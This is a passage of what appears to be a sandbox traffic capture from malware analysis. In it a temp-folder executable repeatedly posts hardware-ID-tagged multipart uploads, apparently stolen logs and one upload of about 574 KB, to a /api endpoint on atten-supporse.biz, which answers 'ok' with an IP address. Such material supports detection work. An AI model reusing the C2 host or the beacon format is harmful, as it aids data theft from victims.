3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 44 56 59 4d 35 Data Ascii: --DVYM5QCPZK6ZJContent-Disposition: form-data; name="hwid"8BEC93B31699AB4123D904AF30EFEBBC--DVYM5QCPZK6ZJContent-Disposition: form-data; name="pid"2--DVYM5QCPZK6ZJContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--DVYM5
2024-12-09 23:44:00 UTC	2808	OUT	Data Raw: 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 Data Ascii: ~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECa
2024-12-09 23:44:01 UTC	1024	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:44:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=jqbof81h57efbpgtrq31q21eft; expires=Fri, 04-Apr-2025 17:30:40 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GyyI5L4RhdnRdCxkALpy0N1uRX9ZsrnWH8k06U%2BvyexO4Di8skdAMw9eNNycj58p%2FxuxeLX1B4jGzfJ5BLxGAGO8rj%2BZrt9a%2BrfWePgMVqrArPT8lHN7i%2F0KkaIK5LFcs44taDo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ef8dc558f280cc8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1644&min_rtt=1644&rtt_var=616&sent=12&recv=22&lost=0&retrans=0&sent_bytes=2846&recv_bytes=19098&delivery_rate=1775075&cwnd=225&unsent_bytes=0&cid=a70ac2cb829b7a04&ts=1034&x=0"
2024-12-09 23:44:01 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a Data Ascii: fok 8.46.123.228
2024-12-09 23:44:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49945	104.21.80.1	443	4600	C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-09 23:44:03 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=3NNYB10D0MGHIUH User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1395 Host: atten-supporse.biz
2024-12-09 23:44:03 UTC	1395	OUT	Data Raw: 2d 2d 33 4e 4e 59 42 31 30 44 30 4d 47 48 49 55 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 42 45 43 39 33 42 33 31 36 39 39 41 42 34 31 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 33 4e 4e 59 42 31 30 44 30 4d 47 48 49 55 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 33 4e 4e 59 42 31 30 44 30 4d 47 48 49 55 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d Data Ascii: --3NNYB10D0MGHIUHContent-Disposition: form-data; name="hwid"8BEC93B31699AB4123D904AF30EFEBBC--3NNYB10D0MGHIUHContent-Disposition: form-data; name="pid"1--3NNYB10D0MGHIUHContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic-
2024-12-09 23:44:04 UTC	1024	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:44:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=dodl51lev5p3f9h860c0obt9gu; expires=Fri, 04-Apr-2025 17:30:43 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WOlOTVf%2F7kMVlKqS3wc5cseRyMil37MQ7yQDao7kbSqrR%2FqvOxBfpc3CyVRgZO1%2FcNmnZVXuUErEI%2FJ9lH9lpKj%2FGoTNdfT8ubPWyF4%2BzvJ%2BtywAolC1im6DAAEeCchvbYvVGno%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ef8dc67aae543df-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1589&min_rtt=1589&rtt_var=596&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2846&recv_bytes=2311&delivery_rate=1834170&cwnd=243&unsent_bytes=0&cid=198c0d9a177af445&ts=731&x=0"
2024-12-09 23:44:04 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a Data Ascii: fok 8.46.123.228
2024-12-09 23:44:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49956	104.21.80.1	443	8048	C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-09 23:44:04 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=J7BTY0Q78VN User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8748 Host: atten-supporse.biz
2024-12-09 23:44:04 UTC	8748	OUT	Data Raw: 2d 2d 4a 37 42 54 59 30 51 37 38 56 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 42 45 43 39 33 42 33 31 36 39 39 41 42 34 31 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 4a 37 42 54 59 30 51 37 38 56 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4a 37 42 54 59 30 51 37 38 56 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 4a 37 42 54 59 30 51 37 38 56 4e Data Ascii: --J7BTY0Q78VNContent-Disposition: form-data; name="hwid"8BEC93B31699AB4123D904AF30EFEBBC--J7BTY0Q78VNContent-Disposition: form-data; name="pid"2--J7BTY0Q78VNContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--J7BTY0Q78VN
2024-12-09 23:44:05 UTC	1021	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:44:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=bve8k5n8f7kp48n2c7erphgib8; expires=Fri, 04-Apr-2025 17:30:43 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pi4%2Fa7DbB7Fkr8hSoSHjVX0LHwjJpW1mPbEk3qSvvaumMTVybNWyvXLrCPOMV7BQTRBWDoJL7XSYlcYu1OKeyESDd2EY8Fo%2BjmRF99b%2BWv53ZL0CzqjK8rBMh0EgMNFZEP%2Fo6%2FE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ef8dc6bccd2429d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1564&min_rtt=1560&rtt_var=593&sent=8&recv=14&lost=0&retrans=0&sent_bytes=2847&recv_bytes=9682&delivery_rate=1830721&cwnd=246&unsent_bytes=0&cid=c71a65f651dfb0d9&ts=992&x=0"
2024-12-09 23:44:05 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a Data Ascii: fok 8.46.123.228
2024-12-09 23:44:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49967	104.21.80.1	443	8048	C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-09 23:44:07 UTC	283	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=MPIYAKU91E316SJ4P User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20437 Host: atten-supporse.biz
2024-12-09 23:44:07 UTC	15331	OUT	Data Raw: 2d 2d 4d 50 49 59 41 4b 55 39 31 45 33 31 36 53 4a 34 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 42 45 43 39 33 42 33 31 36 39 39 41 42 34 31 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 4d 50 49 59 41 4b 55 39 31 45 33 31 36 53 4a 34 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4d 50 49 59 41 4b 55 39 31 45 33 31 36 53 4a 34 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 Data Ascii: --MPIYAKU91E316SJ4PContent-Disposition: form-data; name="hwid"8BEC93B31699AB4123D904AF30EFEBBC--MPIYAKU91E316SJ4PContent-Disposition: form-data; name="pid"3--MPIYAKU91E316SJ4PContent-Disposition: form-data; name="lid"LOGS11--LiveTraf
2024-12-09 23:44:07 UTC	5106	OUT	Data Raw: 00 00 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 Data Ascii: `M?lrQMn 64F6(X&7~`aO
2024-12-09 23:44:08 UTC	1021	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:44:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=l8eddj3i3190br0f3655duqud4; expires=Fri, 04-Apr-2025 17:30:46 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T1TQ3l1dLzLm1tmObbJZI2fOUCeZzI%2FesgtKsNoLAVzIwGiCpJtDB%2By6LvSV%2BDvYhE%2FbMgeQGYzJOp53TpeOAQXwvEzXxskvYP3aZWB4BGuDXuYGkwVeNfgOH7i4puJcaJJMCCA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ef8dc7e8d107d05-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1751&min_rtt=1744&rtt_var=669&sent=14&recv=25&lost=0&retrans=0&sent_bytes=2847&recv_bytes=21400&delivery_rate=1615938&cwnd=195&unsent_bytes=0&cid=e9fb5e4987d8d6e7&ts=919&x=0"
2024-12-09 23:44:08 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a Data Ascii: fok 8.46.123.228
2024-12-09 23:44:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49984	104.21.80.1	443	8048	C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-09 23:44:12 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=ZULW735IH4X69N User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1309 Host: atten-supporse.biz
2024-12-09 23:44:12 UTC	1309	OUT	Data Raw: 2d 2d 5a 55 4c 57 37 33 35 49 48 34 58 36 39 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 42 45 43 39 33 42 33 31 36 39 39 41 42 34 31 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 5a 55 4c 57 37 33 35 49 48 34 58 36 39 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 5a 55 4c 57 37 33 35 49 48 34 58 36 39 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 5a 55 Data Ascii: --ZULW735IH4X69NContent-Disposition: form-data; name="hwid"8BEC93B31699AB4123D904AF30EFEBBC--ZULW735IH4X69NContent-Disposition: form-data; name="pid"1--ZULW735IH4X69NContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--ZU
2024-12-09 23:44:12 UTC	1014	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:44:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=kr52l3olc0r7n45eq0mpk8vntj; expires=Fri, 04-Apr-2025 17:30:51 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k5uVhLLxuEL8Z8MEaPgDhYplxVzKrozOtuEoUsE8T60T6rpTptk%2BFzcWMdK9KLXvdiYz9cGlXrHXAiM93vZt3qblj3rp7Nz4o27Ss6Gu2yAy0PyFD5G%2BQF3iWXFBKY2PiUGZmIU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ef8dc9d2e6643df-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1595&min_rtt=1584&rtt_var=617&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=2224&delivery_rate=1739130&cwnd=243&unsent_bytes=0&cid=25ac908685ce17cb&ts=711&x=0"
2024-12-09 23:44:12 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a Data Ascii: fok 8.46.123.228
2024-12-09 23:44:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	50002	104.21.80.1	443	8048	C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-09 23:44:16 UTC	283	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=4IIHMHQ1YGRVORIY User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 573947 Host: atten-supporse.biz
2024-12-09 23:44:16 UTC	15331	OUT	Data Raw: 2d 2d 34 49 49 48 4d 48 51 31 59 47 52 56 4f 52 49 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 42 45 43 39 33 42 33 31 36 39 39 41 42 34 31 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 34 49 49 48 4d 48 51 31 59 47 52 56 4f 52 49 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 34 49 49 48 4d 48 51 31 59 47 52 56 4f 52 49 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 Data Ascii: --4IIHMHQ1YGRVORIYContent-Disposition: form-data; name="hwid"8BEC93B31699AB4123D904AF30EFEBBC--4IIHMHQ1YGRVORIYContent-Disposition: form-data; name="pid"1--4IIHMHQ1YGRVORIYContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic
2024-12-09 23:44:16 UTC	15331	OUT	Data Raw: 01 61 d0 60 d2 cd af eb 7b ec d3 7b a1 9d d3 89 4a e2 e5 c0 7c 80 ee 8e 84 05 d1 7e ce c2 28 c6 d7 d9 c7 e3 4f c3 0f 15 f5 bc ec f2 fd d5 57 ec 3e d3 11 5f 81 01 29 e6 04 c0 b7 c1 b3 98 87 df d8 79 94 6f 36 e2 f0 37 58 9c 71 f9 ff 8c 00 f2 90 0a 3c f2 db 10 dc 0f e2 0c a9 b9 7e 80 99 cb 07 4e c3 01 91 21 38 ee 51 d9 5a 07 bf 99 fd 98 0d c5 90 95 62 5e 94 2f 7d 76 2d e5 77 de 54 cb 08 04 ed e5 db 73 d6 fa 40 6b db 25 ef e7 71 5e cf ab 45 3c 3d 70 84 36 f1 e6 68 8d 06 2e c7 bd 26 59 2d ff f2 0f fc 40 98 24 ba f5 3e 85 b9 c8 9e f9 f2 d7 b6 76 2c a5 3c 4e c1 3c ef 1b ee 8c 66 7a a3 8f 32 e8 7c 42 0f 7c af 5c ab 24 12 c6 36 73 de 5d 1a b4 6a da c9 ef 41 53 4e 86 98 a4 2c 5f 6d 5f fc 5b 0c 47 24 a8 de 44 2c 4c 48 dc d6 8c 1e 35 95 cb ea 0f 43 e4 4d 2e 5f 07 db Data Ascii: a`{{J\|~(OW>_)yo67Xq<~N!8QZb^/}v-wTs@k%q^E<=p6h.&Y-@$>v,<N<fz2\|B\|\$6s]jASN,_m_[G$D,LH5CM._
2024-12-09 23:44:16 UTC	15331	OUT	Data Raw: 90 30 18 5a b1 df d6 22 00 f2 7a f0 fc b7 c7 83 7d 9a 77 de de dd 2d 7b 68 59 4a c9 ad ee aa 2a 77 8f 7e 56 3c 2e a3 e9 b2 69 fc 51 1b 1b 78 b9 b0 3b 38 09 1f ec 25 5a ee f0 95 5e ff d5 ff fa 5b 9b 2a f7 88 9a 9a 42 49 30 54 1c 62 0a 31 66 73 f1 60 db 8e 7f b5 58 6a 5d 04 62 90 fe 3b 72 7d fe 25 48 9a f9 ef 10 eb dc 6c 0d 6f 40 23 21 01 c4 29 f2 ff 35 68 5a aa bf 4f d4 04 22 e0 30 86 77 72 cf ee 3e 20 bd 9f a6 8a c0 f1 f5 eb fb 64 1b 65 92 a1 ea d5 9d 75 fd 72 95 52 60 b1 f1 06 e4 2b fa 2c fd b8 9a 68 fb 47 f4 95 ec fb bc 3d 7f 01 45 30 ae 9e f0 f3 f8 9f b6 82 c8 3a e4 40 8b b7 fe 20 48 c1 65 c6 f8 f4 28 44 0b 47 07 c0 c7 16 54 8a 38 f2 eb ba 1a 9e b8 ab 06 4c c2 6e c2 03 4e 10 11 7c 98 8a 78 4d 2a d0 f2 c8 dd db a0 b3 25 7f 8a 54 3c 5f bb 86 2f 35 49 ef Data Ascii: 0Z"z}w-{hYJw~V<.iQx;8%Z^[BI0Tb1fs`Xj]b;r}%Hlo@#!)5hZO"0wr> deurR`+,hG=E0:@ He(DGT8LnN\|xM*%T<_/5I
2024-12-09 23:44:16 UTC	15331	OUT	Data Raw: f3 f3 c2 ca c2 4a 75 eb ea c2 57 c6 5a 6d 6b 7a 33 21 8f d3 13 4c d4 3e ee d8 77 df a2 5f a2 99 20 10 bd fb 3f 1f bc 97 65 7f ae 6c ff 58 59 f1 b2 26 13 89 43 84 5b e8 db c7 c9 37 72 d3 00 5d 8d 48 a5 a1 c9 fc 28 5e 25 e0 81 c5 ae 1f d3 b0 54 c1 3b e5 98 60 c1 53 28 1c 71 80 6b 78 70 10 e7 51 a2 f2 62 96 fd d0 e4 23 0f ec 3c f9 f6 cd eb 3f 74 dd 2c e7 87 d0 23 9d 17 e7 00 f1 0a 44 54 18 ca 47 01 d7 b6 82 27 4f e0 52 50 af ff df a9 b5 36 17 ac d5 db f7 eb 0d da 76 e1 fa f5 58 e4 9d d9 6a 5f 5e b3 e2 53 6e d5 5e 18 2f de 15 f9 85 e2 2c 51 3f 4b af 86 80 44 1c e4 36 b9 77 dd 8a 27 40 1e 38 7f 9f 23 45 d4 e0 86 e2 4a 51 bb f2 76 e9 61 bf 4b 08 bc 46 d3 3b 05 c8 ba 2c f5 15 21 8b 5a 52 aa 28 4e 04 bc 11 55 b7 04 99 0d 21 ae 80 30 54 30 37 2c 27 36 52 ad f5 8c Data Ascii: JuWZmkz3!L>w_ ?elXY&C[7r]H(^%T;`S(qkxpQb#<?t,#DTG'ORP6vXj_^Sn^/,Q?KD6w'@8#EJQvaKF;,!ZR(NU!0T07,'6R
2024-12-09 23:44:16 UTC	15331	OUT	Data Raw: b6 c4 38 2e e7 88 f5 3d f0 cc d6 73 31 4c ef 6d 84 a7 97 42 dd f9 27 5f 58 93 74 39 38 16 58 04 dc 89 f4 12 0d 4d 6e 52 66 32 62 1a 59 25 0f 5c e6 cb 2f 3d 90 e0 14 82 fa 47 30 11 df 3c 22 84 32 ae e0 00 0e 81 67 af 04 66 f5 b9 15 81 40 68 23 b4 90 e1 0f 83 fa a1 91 91 81 70 98 df ba 46 2f 3f c3 a2 a9 31 90 6e 4e fb 7d 82 6c 7a f4 78 78 46 84 76 05 57 c5 1b a1 b0 fa 56 c9 9a 6c 15 70 66 52 1e 22 ba f1 2d 0f 20 f1 88 40 e9 5b be 26 fe 1a 86 6d 91 9a 6b 95 3e 37 49 13 cd 07 24 85 27 9c 8c f5 b9 53 98 33 93 17 f7 af e7 0e a9 63 86 03 1f 0d 0e 07 1f 5b 50 ee 2e 62 b4 6a 8b d9 69 4b 35 2f 04 33 ae 1d 27 8b ad bf d6 b4 1d 96 6f 5d 94 b4 af 0f d3 10 6d 2b e7 84 71 53 04 05 46 82 30 20 18 03 63 6c 83 fe 5d 02 f4 91 05 23 31 60 1b 4d ab 3a 57 ec 14 83 09 47 a4 5b Data Ascii: 8.=s1LmB'_Xt98XMnRf2bY%\/=G0<"2gf@h#pF/?1nN}lzxxFvWVlpfR"- @[&mk>7I$'S3c[P.bjiK5/3'o]m+qSF0 cl]#1`M:WG[
2024-12-09 23:44:16 UTC	15331	OUT	Data Raw: b1 23 ae a1 b4 9f e0 25 78 c8 8b db 6b e2 98 2a fd 98 85 e0 da 7f db 16 bb 02 2a b9 36 eb 51 2f 2d 02 25 c7 e2 2e 83 ab a3 89 a8 56 d2 c5 d3 93 59 1a 78 68 2e 66 dc 3a b7 2e 82 e7 12 96 c2 d6 ba 40 37 87 90 f0 8c e4 c7 57 e2 7d 91 54 03 04 d6 48 c5 af 5b 86 cc af 2e eb 16 8c 21 25 10 a1 da cf 27 40 0c f7 74 41 26 e9 3c 8c 7c be 0b 07 bb 3c aa 07 cc 54 7c 64 79 bb c9 41 d2 39 c0 7e 3f 5b 9c b5 04 52 db 28 15 6b 81 b3 e0 34 98 72 57 14 03 9a 57 4c a9 3b 60 63 50 2b b3 72 e0 81 f2 dd cd 01 5d 0c 11 55 a1 26 e3 9e d7 8b 30 d9 94 31 d6 ad b2 b3 40 fe 0f 0a 98 93 36 ad 69 23 05 ed bb 8e f0 a0 cd 41 09 95 10 6d c2 d0 1c 07 0c e3 e1 16 24 b0 7c 04 77 89 82 dd 65 cb c2 f4 76 e3 5e 71 50 b6 79 7b 6f 00 0a 68 b0 9f 68 22 2a 0b b5 8a 08 d1 73 3a 25 19 50 df c1 f1 62 Data Ascii: #%xk*6Q/-%.VYxh.f:.@7W}TH[.!%'@tA&<\|<T\|dyA9~?[R(k4rWWL;`cP+r]U&01@6i#Am$\|wev^qPy{ohh"s:%Pb
